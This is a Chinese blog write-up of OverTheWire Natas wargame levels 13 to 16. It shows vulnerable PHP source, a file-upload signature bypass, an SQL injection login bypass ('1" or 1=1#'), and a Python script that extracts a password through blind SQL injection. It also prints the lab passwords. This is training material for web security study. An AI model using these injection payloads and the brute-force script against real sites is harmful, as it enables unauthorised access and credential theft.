OverTheWire的natas游戏(13-20)

最新推荐文章于 2023-05-20 11:21:52 发布
最新推荐文章于 2023-05-20 11:21:52 发布
阅读量370 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: OverTheWire
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40710190/article/details/118571734
本文介绍了Natas系列练习中关于Web安全的几个关卡,涉及PHP SQL注入、命令注入及Session管理。通过利用payload绕过限制,获取密码。同时也探讨了如何防御此类攻击,包括输入验证、参数化查询和安全编码等实践。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

natas solution(13-20)

Natas Level 12 → Level 13

Username: natas13
URL:      http://natas13.natas.labs.overthewire.org

这一关和上一关非常相似,不同的在于

<?php
if(array_key_exists("filename", $_POST)) {
   
   
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);
    
    $err=$_FILES['uploadedfile']['error'];
    if($err){
   
   
        if($err === 2){
   
   
            echo "The uploaded file exceeds MAX_FILE_SIZE";
        } else{
   
   
            echo "Something went wrong :/";
        }
    } else if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
   
   
        echo "File is too big";
    } else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
   
   
        echo "File is not an image";
    } else {
   
   
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
   
   
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
   
   
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
   
   
?>

多了一个检查函数exif_imagetype

读取一个图像的第一个字节并检查其签名。

所以在上一关payload的基础上,在开头添加jpg的签名即可,然后上传获得密码

Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Natas Level 13 → Level 14

Username: natas14
URL:      http://natas14.natas.labs.overthewire.org

这一关是一个简单的sql注入

<?
if(array_key_exists("username", $_REQUEST)) {
   
   
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);
    
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
   
   
        echo "Executing query: $query<br>";
    }

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
   
   
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
   
   
            echo "Access denied!<br>";
    }
    mysql_close($link);
} else {
   
   
?>

根据源码的sql我们构造如下payload

Username Password
1" or 1=1# 1

这里需要注意的是--+不起效果,所以注释用的#

密码到手

Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Natas Level 14 → Level 15

Username: natas15
URL:      http://natas15.natas.labs.overthewire.org

这一关非常的耗时间,尽管是看wp不过得到了一些启发就是好的

进入界面后发现只是要你输入用户名,输入natas16告诉我们该用户存在,通过源码可以发现好像是没有手段能得出密码,像上一关那样

<?
/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
   
   
    $link = mysql_connect('localhost', 'natas15', '<censored>');
    mysql_select_db('natas15', $link);
    
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
   
   
        echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
   
   
    if(mysql_num_rows($res) > 0) {
   
   
        echo "This user exists.<br>";
    } else {
   
   
        echo "This user doesn't exist.<br>";
    }
    } else {
   
   
        echo "Error in query.<br>";
    }

    mysql_close($link);
} else {
   
   }
?>

没有能得到密码的回显,所以我的思路转移到了密码枚举因为输入000" or 1=1#得到的回显是This user exists.这里参考了别人的wp但是根据自身的情况修改了,但是怎么说呢,总是有点奇奇怪怪的问题,不太敢保证在真实情况下能保持自信“我是对的”

在脚本之前,我们需要学习一个mysqlLIKE关键字(没有什么是比官方文档更好的了😀)

import requests
import time

url='http://natas15.natas.labs.overthewire.org/'
passchar='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXVZ1234567890'
bstr='This user exist'.encode('utf-8')
password=''
headers = {
   
   
    'Authorization': 'xxxxx',
    'Cookie': 'xxxxxxx',
}

print('go')
for i in range(32):
    print(i)
    for j in passchar:
        time.sleep(1)
        try:
            poc = url+'?username=natas16%22+AND+password+LIKE+BINARY+%27' + password + j + "%25%27%23"
            print(poc)
            req = requests.get(poc,headers=headers)
            req.encoding = req.apparent_encoding
        except:
            print("获取失败")
            req.close()
        if req.content.find(bstr) != -1:
            password += j
            print('Password: ' + password)
            break
req.close()

之所以设置了time.sleep(1)是因为一开始经常跑着跑着就停下来了,猜测是因为请求速度过快?但是后来即使不间隔1s也能跑,我反正是不懂为啥了。

跑完后的密码是

WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

Natas Level 15 → Level 16

Username: natas16
URL:      http://natas16.natas.labs.overthewire.org

这一关和上一关做法非常的相似,但是题目却和之前的第10关很像,来看看源码吧。

Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
   
   
    $key = $_REQUEST["needle"];
}

if($key != "") {
   
   
    if(preg_match('/[;|&`\'"]/',$key)) {
   
   
        print "Input contains an illegal character!";
    } else {
最低0.47元/天 解锁文章

200万优质内容无限畅学
OverTheWirenatas游戏(6-10)
qq_40710190的博客
07-02 237
natas solution(6-10) Natas Level 5 Level 6 Username: natas6 URL: http://natas6.natas.labs.overthewire.org 这一关不难,但是有一点可以讲一讲的。进去之后要我们往框框里输入东西后提交。不过旁边就有源码,直接看看源码吧 <? include "includes/secret.inc"; if(array_key_exists("submit", $_POST)) { if($s
OverTheWirenatas游戏(0-5)
qq_40710190的博客
06-28 263
natas solution(0-5) 这是一个关于web安全的闯关游戏,通过闯关学习相关知识 Natas teaches the basics of serverside web-security. Each level of natas consists of its own website located at http://natasX.natas.labs.overthewire.org, where X is the level number. There is no SSH login. To
OverTheWire-Natas
kang0x0的博客
08-11 1090
学习目标: 提示:这里可以添加学习目标 例如:一周掌握 Java 入门知识 学习内容: 提示:这里可以添加要学的内容 例如: 1、 搭建 Java 开发环境 2、 掌握 Java 基本语法 3、 掌握条件语句 4、 掌握循环语句 学习时间: 提示:这里可以添加计划学习的时间 例如: 1、 周一至周五晚上 7 点—晚上9点 2、 周六上午 9 点-上午 11 点 3、 周日下午 3 点-下午 6 点 学习产出: 提示:这里统计学习计划的总量 例如: 1、 技术笔记 2 遍 2、优快云 技术博客 3 篇
natas(level0-level14)通关详细指南()
tempulcc的博客
09-24 3110
natas通关指南level0level1level2level3level4 很久以前玩的一个Web安全的通关游戏Natas,每一关的地址是http://natasX.natas.labs.overthewire.org,其中X代表当前关数,默认用户名是nataX(eg.natas0 是level0的用户名),通过当前的一关获取进入下一关的密码。 level0 URL: http://natas0.natas.labs.overthewire.org Username: natas0 Password:
mysql注入万能密码_Natas14 Writeup(sql注入、sql万能密码)
weixin_39861255的博客
02-07 286
Natas14:是一个登录页面。源码如下。if(array_key_exists("username", $_REQUEST)) {$link = mysql_connect('localhost', 'natas14', '');mysql_select_db('natas14', $link);$query = "SELECT * from users where username=\"".$...
natas16 题解
lyover的博客
11-26 1121
本题与上一题相似(可看我上篇文章nata15 题解) 进入后发现和早前某关像,执行一个grep命令查找,这里的过滤字符中恰恰没包括 $ . * 这三个,可以利用$(grep -E ^8.* /etc/natas_webpasswd/natas17)hello 这样去输入 如果返回了hello和其他的字串,说明这里的grep没有执行,-E 是执行一个正则表达式,^8,* 这个表达式的意思是以8开
网络空间安全——Wargame靶场(Natas
weixin_44717952的博客
05-20 1583
访问的网站才能看到密码”,在 http 的 refer 字段中表明来源,所以我们需要修改这个字段的值为上面的网址。拦截浏览器发送的请求,修改 refer 字段中的值为上述网址,然后点击 Forward,即可看到密码。爬虫在收集网页信息时,首先查看该网页的 robot.txt 文件,从中获取可以爬取的内容信息。右键->查看网页源代码,发现什么都没有,但是这时候一行字引起我们的注意,Google 都找不到这个网站。我们可以看到 /s3cr3t/ 文件夹,在浏览器中打开它,我们就可以看到密码了。
natas:overthewire 战争游戏 natas 的解决方案集合
06-10
在这个教程中,我们将深入探讨Natas游戏的解决方案,并重点关注JavaScript这一关键技术。 一、Natas游戏概述 Natas游戏由多个级别组成,每个级别都是一场小规模的网络攻防战,玩家需要通过发现并利用Web应用程序的...
OverTheWirenatas游戏(21-34)
qq_40710190的博客
07-18 999
natas solution(21-34) Natas Level 20 Level 21 Username: natas21 URL: http://natas21.natas.labs.overthewire.org 这一关涉及到一个共享session的知识点,算是本关的收获吧。 进入页面后看到提示 Note: this website is colocated with http://natas21-experimenter.natas.labs.overthewire.org 在看
overthewire朝花夕拾
月流霜的专栏
05-29 973
bandit: cat特殊字符文件名 - cat ./- 空格 cat "abc def"  or cat abc\ def 列出隐藏文件:ll du -ab 递归列出文件大小,以字节为单位 输出唯一不重复的行 sort data.txt | uniq  -u uniq标志 -c 在输出行前面加上每行在输入文件中出现的次数。 -d 仅显示重复行。 -u 仅显
OverTheWire: Bandit通关指引
热门推荐
weixin_47610939的博客
01-16 1万+
OverTheWire Wargame的Bandit通关指引
国内外优秀网安练习平台
Ms08067安全实验室
12-06 1029
0x01 前言小编总结网上一些靶场类型,并进行了分类,整理不足可以及时给小编留言!0x02基础类靶场1. DVWA:http://www.dvwa.co.u2.BWVS:https://github.com/bugku/BWVS3.Webug3.0:https://pan.baidu.com/s/1cM39UrKeWjS92-3am8L_bg?pwd=xjqr4. BWAPP:https://...
OverTheWire-Bandit
LJFYYJ的博客
05-18 577
Bandit https://overthewire.org/wargames/bandit/ bandit前33关主要包含以下知识点: 读文件(~:bandit12):文件名有-、有空格;搜索特定大小、人类可读文件;文件字符串排序、base64解密、字符变换;文件解压。 网络连接(bandit13:bandit20):private key ssh登录、ssh登录执行命令;nc连接与监听;ssl加密连接;namp扫描;setuid程序用户提权。 定时任务(bandit21:bandit23):
overthewire靶场之——bandit(1-10)
LizePing_的博客
06-15 3022
bandit,主要练习linux命令Level 0关卡介绍:解决方案:Level 0 Level 1关卡介绍:解决方案:Level 1 Level 2关卡介绍:解决方案:Level 2 Level 3关卡介绍:解决方案:Level 3 Level 4关卡介绍:解决方案:Level 4 Level 5关卡介绍:解决方案:Level 5 Level 6关卡介绍:解决方案:Level 6 Level 7关卡介绍:解决方案:Level 7 Level 8关卡介绍:解决方案:Level
WarGames-Natas16
whklhhhh的博客
08-18 567
natas(16)<? $key = "";if(array_key_exists("needle", $_REQUEST)) { $key = $_REQUEST["needle"]; }if($key != "") { if(preg_match('/[;|&`\'"]/',$key)) { print "Input contains an illegal cha
wargame-Natas(1-20)
weixin_43220691的博客
11-30 2580
wargame-natas write up
natas(level15-level25)通关详细指南()
tempulcc的博客
09-27 1115
level15 URL:http://natas15.natas.labs.overthewire.org Username:natas15 Password:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J 源码 <? /* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) DEFAULT NULL ); */ if(array_key_exists("
web向wargame:natas通关手记
陈文青
08-16 7702
与之前做过的跟ssh和终端打交道的题目不同,nat
web安全Wargame—Natas解题思路(1-26)
xiaoi123的博客
08-29 1222
前言:   Natas是一个教授服务器端Web安全基础知识的 wargame,通过在每一关寻找Web安全漏洞,来获取通往下一关的秘钥,适合新手入门Web安全。 传送门~ 接下来给大家分享一下,1-20题的WriteUp。Natas0: 提示密码就在本页,右键查看源码,注释中发现key Key:gtVrDuiDfck831PqWsLEZy5gyDz1clto 知识点:查看页面源码 Na...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值